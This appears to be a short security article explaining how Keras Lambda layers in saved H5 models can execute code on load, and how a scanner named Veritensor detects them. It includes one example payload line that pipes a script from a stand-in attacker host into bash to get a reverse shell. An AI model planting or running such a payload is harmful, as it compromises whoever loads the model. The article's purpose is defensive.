Keras Lambda Injection: Code Execution via Model Architecture
The Flexibility of Keras
Keras (and TensorFlow) allows developers to define custom layers using the Lambda layer. This is a powerful feature that lets you write arbitrary Python logic inside your neural network architecture.
For example:
model.add(Lambda(lambda x: x ** 2))
When you save this model to an H5 file (model.h5 or model.keras), Keras serializes this lambda function.
The Vulnerability
The problem arises because Keras serializes the bytecode or the source code of the lambda function into the model configuration. When a user loads the model using load_model(), Keras deserializes and compiles this code.
An attacker can craft a malicious H5 file where the Lambda layer contains a payload:
# Malicious Lambda
Lambda(lambda x: os.system("curl hacker.com/rev_shell | bash") or x)
If a victim loads this model, the system command executes during the graph construction phase—often before model.predict() is ever called.
Why It's Dangerous
Unlike Pickle, which is known to be unsafe, many developers treat H5 files as "safe" structured data (Hierarchical Data Format). They assume it just contains matrices.
This vector is particularly dangerous for platforms that allow users to upload their own models for evaluation or fine-tuning.
Detecting Lambda Injections
Defense requires inspecting the model's configuration JSON without loading the model into the TensorFlow engine.
Veritensor parses the H5 structure and extracts the model_config attribute. It then scans the JSON architecture for:
- Layers with class_name: "Lambda".
- Suspicious code strings inside the lambda configuration.
veritensor scan dangerous_model.h5
# Output: CRITICAL: Keras Lambda layer detected (RCE Risk)
If you see a Lambda layer in a public model you didn't create, treat it with extreme suspicion.